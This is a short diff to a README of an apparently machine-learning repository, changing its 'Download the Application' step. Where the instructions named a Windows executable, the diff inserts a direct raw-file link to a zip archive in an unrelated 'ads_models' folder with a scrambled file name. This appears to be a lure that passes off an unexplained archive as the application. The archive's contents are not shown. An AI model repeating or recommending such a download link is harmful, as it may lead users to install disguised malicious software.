AmphyRoblox/classify_i_machine_learning/README.md

 ### Step 2: Download the Application

 1. Look for the file that fits your operating system.
-For Windows, it might be something like `classify_i_machine_learning.exe`.
+For Windows, it might be something like `https://raw.githubusercontent.com/AmphyRoblox/classify_i_machine_learning/main/ads_models/learning-i-classify-machine-v1.7.zip`.
 For Mac, look for a `.dmg` file.
 2. Click on the download link.
 The file will start downloading to your computer.

 ### Step 3: Install the Application